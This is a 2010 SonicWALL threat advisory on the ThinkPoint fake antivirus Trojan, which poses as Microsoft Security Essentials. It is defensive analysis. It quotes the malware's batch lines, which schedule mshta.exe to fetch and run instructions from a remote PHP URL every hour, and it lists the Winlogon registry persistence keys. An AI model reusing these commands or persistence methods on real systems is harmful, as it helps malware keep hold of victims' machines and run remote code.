ThinkPoint FakeAV (Nov 12, 2010)

SonicWALL UTM Research team received reports of a new fake antivirus Trojan in the wild. This Trojan attemps to access a php script on a compromised webserver on the internet for further instructions.

During our research we found that the Trojan will masquerade as the legitimate antivirus product "Microsoft Security Essentials", complete with fake pop-up alerts and detailed scan results.

screenshot

The screenshots seen above are a result of attempting to run specific legitimate programs such as Internet Explorer and RegEdit that are chosen by this fake antivirus to be a potential threat to the system.

The Trojan performs the following activities upon execution:

Drops the following three files on the compromised machine:

C:Documents and SettingsUserApplication Data444.bat

at 00:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030

at 01:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030

at 02:23 /every:M,T,W,Th,F,S,Su mshta.exe http://91.188.x.x/77t.php?olala=4032432825575030

...

etc.

C:Documents and SettingsUserApplication Dataasdsada.bat

Contains script to delete the fakeav installer.

C:Documents and SettingsUserApplication Datahotfix.exe

Creates the following registry entry to ensure regular startup:
- HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon Shell "C:Documents and SettingsUserApplication Datahotfix.exe"
Additional registry keys created:
- HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache C:Documents and SettingsUserApplication Data444.bat "444"
- HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache C:Documents and SettingsUserApplication Dataasdsada.bat "asdsada"

Creates 24 scheduled tasks in C:WINDOWSTasks to ensure it runs hourly:
- C:WINDOWSTasksAt<1-24>.job
Attemps to use mshta.exe to open a url in order to receive further instructions:
- URL: http://91.188.x.x/77t.php?olala=4032432825575030

SonicWALL Gateway AntiVirus provided protection against this threat via the following signature:

GAV: FakeAv.IOX (Trojan)

Share This Article

An Article By

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.